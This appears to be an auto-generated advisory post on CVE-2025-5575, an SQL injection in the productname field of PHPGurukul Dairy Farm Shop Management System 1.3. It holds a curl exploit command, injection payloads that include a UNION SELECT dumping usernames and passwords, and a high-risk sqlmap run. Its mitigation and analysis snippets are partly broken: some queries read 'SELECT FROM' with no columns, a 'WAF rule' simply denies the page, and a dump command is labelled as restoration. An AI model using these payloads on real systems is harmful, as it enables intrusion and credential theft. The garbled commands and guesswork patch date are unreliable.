PHPGurukul Dairy Farm Shop Management System 13, SQL Injection, CVE-2025-5575 (Critical)

Listen to this Post

How CVE-2025-5575 Works

The vulnerability in PHPGurukul Dairy Farm Shop Management System 1.3 arises from improper input sanitization in the `/add-product.php` file. The `productname` parameter is directly concatenated into an SQL query without validation, allowing attackers to inject malicious SQL commands. Remote attackers can exploit this flaw by crafting a specially crafted HTTP request, manipulating the `productname` parameter to execute arbitrary SQL queries. This can lead to unauthorized data access, modification, or deletion. The exploit is publicly available, increasing the risk of widespread attacks.

DailyCVE Form

Platform: PHPGurukul Dairy Farm
Version: 1.3
Vulnerability: SQL Injection
Severity: Critical
Date: 06/05/2025

Prediction: Patch expected by 07/15/2025

What Undercode Say:

Exploitation Commands

curl -X POST "http://target.com/add-product.php" -d "productname=' OR 1=1--"

SQL Injection Payloads

' UNION SELECT username, password FROM users--
' OR EXISTS(SELECT FROM users WHERE username='admin')--

Detection Command

sqlmap -u "http://target.com/add-product.php" --data="productname=test" --risk=3 --level=5

Mitigation Steps

1. Input Validation

$productname = mysqli_real_escape_string($conn, $_POST['productname']);

2. Prepared Statements

$stmt = $conn->prepare("INSERT INTO products (name) VALUES (?)");
$stmt->bind_param("s", $productname);

3. WAF Rules

location ~ /add-product.php {
deny all;
}

4. Patch Verification

grep -r "mysqli_real_escape_string" /var/www/html/

5. Log Monitoring

tail -f /var/log/apache2/access.log | grep 'add-product.php'

Post-Exploitation Analysis

SELECT FROM mysql.user WHERE User='attacker';

Backup Restoration

mysqldump -u root -p dairyfarm > backup.sql

Vulnerability Scanner

nikto -h http://target.com -id 1000

PHP Hardening

allow_url_include = Off
display_errors = Off

End of Report

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top